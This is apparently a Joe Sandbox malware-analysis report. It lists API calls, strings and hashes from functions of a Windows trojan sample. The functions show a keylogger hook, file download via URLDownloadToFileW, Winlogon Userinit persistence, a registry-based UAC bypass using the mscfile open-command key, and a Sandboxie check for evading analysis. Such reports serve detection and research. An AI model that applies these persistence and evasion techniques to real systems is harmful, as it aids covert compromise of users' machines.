                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                • String ID: ^7@
                                                • API String ID: 2478582372-2142780172
                                                • Opcode ID: 0e87240cedd43ac40345285c67cdaba35df7ae443a680c715d7ff6c23904c2f5
                                                • Instruction ID: 5b9e4d41e0effa1abe2d42325b5bfd94b4549995def9576f2f352d1a1525ac23
                                                • Opcode Fuzzy Hash: 0e87240cedd43ac40345285c67cdaba35df7ae443a680c715d7ff6c23904c2f5
                                                • Instruction Fuzzy Hash: 8BF0977590010EABCF04EFA4E95D9EE7B78BF4430AB00C064F906972A0DA74AB05CB65
                                                APIs
                                                • Sleep.KERNEL32(00000064), ref: 0040DF59
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DF7C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DF8E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DFA9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DFB4
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DFD6
                                                • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DFDE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000), ref: 0040DFF2
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E006
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@DownloadFileSleepV01@@
                                                • String ID:
                                                • API String ID: 3062298965-0
                                                • Opcode ID: 0a608acb1cfbf9d2bda4a8d586b6d33f01c67cb96d51d5d4e2eb97eaf374c08e
                                                • Instruction ID: 1e733e21b8eb4b734f6a18e76189f4380bbd31b29490436d09cce0317758e49b
                                                • Opcode Fuzzy Hash: 0a608acb1cfbf9d2bda4a8d586b6d33f01c67cb96d51d5d4e2eb97eaf374c08e
                                                • Instruction Fuzzy Hash: ED116FB19061486FDB04EBB0DD599EE373CAF40305F0044AAF506E61E2EE345B488B59
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000), ref: 0040315E
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403167
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 00403187
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004031B2
                                                  • Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                  • Part of subcall function 0040AA65: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                  • Part of subcall function 0040AA65: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                  • Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                  • Part of subcall function 0040AA65: RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                  • Part of subcall function 0040AA65: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 004031D1
                                                  • Part of subcall function 0040ACB8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040ACC9
                                                  • Part of subcall function 0040ACB8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004031DE,?), ref: 0040ACD9
                                                  • Part of subcall function 0040ACB8: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE,80000001), ref: 0040ACF0
                                                  • Part of subcall function 0040ACB8: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE), ref: 0040AD08
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD1F
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD28
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD31
                                                  • Part of subcall function 0040ACB8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD3A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                                • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                                • API String ID: 1883807236-2313358711
                                                • Opcode ID: 920d5bafc3d51276bf4a7a75ea5828d009af6e92881e8e9abfbc4f88b7f5e3e2
                                                • Instruction ID: 89cef9655f84d49fe62a01630c1b0ff64e194b31992f440816768c493fc3ce6b
                                                • Opcode Fuzzy Hash: 920d5bafc3d51276bf4a7a75ea5828d009af6e92881e8e9abfbc4f88b7f5e3e2
                                                • Instruction Fuzzy Hash: 51110A72A0415437DB026BA8DC55BEFBA6C9B45302F0440F6F905B23C2DA390B4687AE
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0,00000000,80000001,00419970), ref: 00409FBD
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00409FE9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409FF2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000410,00000000), ref: 0040A00F
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040A033
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0), ref: 0040A043
                                                • Sleep.KERNEL32(00000BB8), ref: 0040A06A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A07E
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040A0AF
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A0B8
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040A0C1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A0CE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000), ref: 0040A0DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                                • String ID: .exe$EXEpath$WDH$open$temp_$|EA$)A
                                                • API String ID: 3885969548-4292904181
                                                • Opcode ID: c561dc225f660c5649a62fc6d381b5c9714ad7b39b8a7cbbf28672b9763f3b8e
                                                • Instruction ID: 5ce5f56d814836a7d7c913f011f37f2a23188a8f242fef4b1dcdd93c69eb0a68
                                                • Opcode Fuzzy Hash: c561dc225f660c5649a62fc6d381b5c9714ad7b39b8a7cbbf28672b9763f3b8e
                                                • Instruction Fuzzy Hash: B60126B264031567DB006B54AC6AFDB731CAB44706F1040BBF605B62C2CEB819C4866E
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040C52F,0040C5BF,00000001), ref: 00405041
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405058
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040506C
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405083
                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@@$CloseHandleHookUnhookV01@V10@0@WindowsY?$basic_string@printfsprintf
                                                • String ID: Online Keylogger Stopped$[INFO]
                                                • API String ID: 2594580136-2146459034
                                                • Opcode ID: 0bef3106ec53906a6e3af0d878d6c95e22956ee15dbd8531141e3242d56941ed
                                                • Instruction ID: 0e4a5bcc932a51b9ccaf35b4182b123e8ca4fbcc4f03a5a91f857ffd31fb5762
                                                • Opcode Fuzzy Hash: 0bef3106ec53906a6e3af0d878d6c95e22956ee15dbd8531141e3242d56941ed
                                                • Instruction Fuzzy Hash: 1501F9716002447FD7117F69DC858BF7BACEB4135174048BEE44293241DB79AD488BD9
                                                APIs
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00419970,00419BC8,00000000,004086F0,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401013
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040103B
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401060
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401085
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004010AA
                                                • CreateThread.KERNEL32(00000000,00000000,004011F8,00000000,00000000,00000000), ref: 004010C0
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004010D1
                                                • CreateThread.KERNEL32(00000000,00000000,00401216,00000000,00000000,00000000), ref: 004010E5
                                                  • Part of subcall function 004010F1: GetModuleHandleA.KERNEL32(SbieDll.dll,00401025,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004010F6
                                                  • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,004135D8,00419970,00419BC8), ref: 00401259
                                                  • Part of subcall function 00401234: exit.MSVCRT ref: 00401263
                                                  • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,004135D4,00000001,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00401278
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$?data@?$basic_string@D@2@@std@@$??8std@@CreateD@2@@0@ThreadV?$basic_string@$HandleModuleexit
                                                • String ID:
                                                • API String ID: 3827955099-0
                                                • Opcode ID: 9699b6661a2531067438056e6e17c84c43a50abd6980c9449cbbc3e7b6e8e41f
                                                • Instruction ID: 2c940d2da2653a837d1dd7f7d97b81215891652aa2bafba10f3e04c873c359e3
                                                • Opcode Fuzzy Hash: 9699b6661a2531067438056e6e17c84c43a50abd6980c9449cbbc3e7b6e8e41f
                                                • Instruction Fuzzy Hash: 5C21F42064129076EA2537B26C1EAAF1A1A5BC270970400BFF582BB6F2DD7D4D81975D
                                                APIs
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00410022
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 0041003A
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00410052
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,?,?), ref: 00410067
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,?,?), ref: 0041007A
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00410091
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004100A8
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004100BF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputSend
                                                • String ID:
                                                • API String ID: 3431551938-0
                                                • Opcode ID: 1a76d25b3cdd7c893661035fc128670239433febc604796783e0d9c8bd1496aa
                                                • Instruction ID: 8a5223b5b29047144f8416e07a443cadd3070263aba7f0ad688ce4aaf9348b9a
                                                • Opcode Fuzzy Hash: 1a76d25b3cdd7c893661035fc128670239433febc604796783e0d9c8bd1496aa
                                                • Instruction Fuzzy Hash: 713141B1D5120EA9EB11DF949981FFFBFBCAF18304F504026E640B6142D3B44A899BE6
                                                APIs
                                                  • Part of subcall function 0040937B: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409389
                                                  • Part of subcall function 0040937B: LoadResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 00409394
                                                  • Part of subcall function 0040937B: LockResource.KERNEL32(00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 0040939B
                                                  • Part of subcall function 0040937B: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00408F3C,00000000,?,?,00000000), ref: 004093A6
                                                • malloc.MSVCRT ref: 00408F46
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00408F72
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408F7E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408F87
                                                • malloc.MSVCRT ref: 00408F98
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • free.MSVCRT ref: 00408FE3
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408FF1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408FFA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
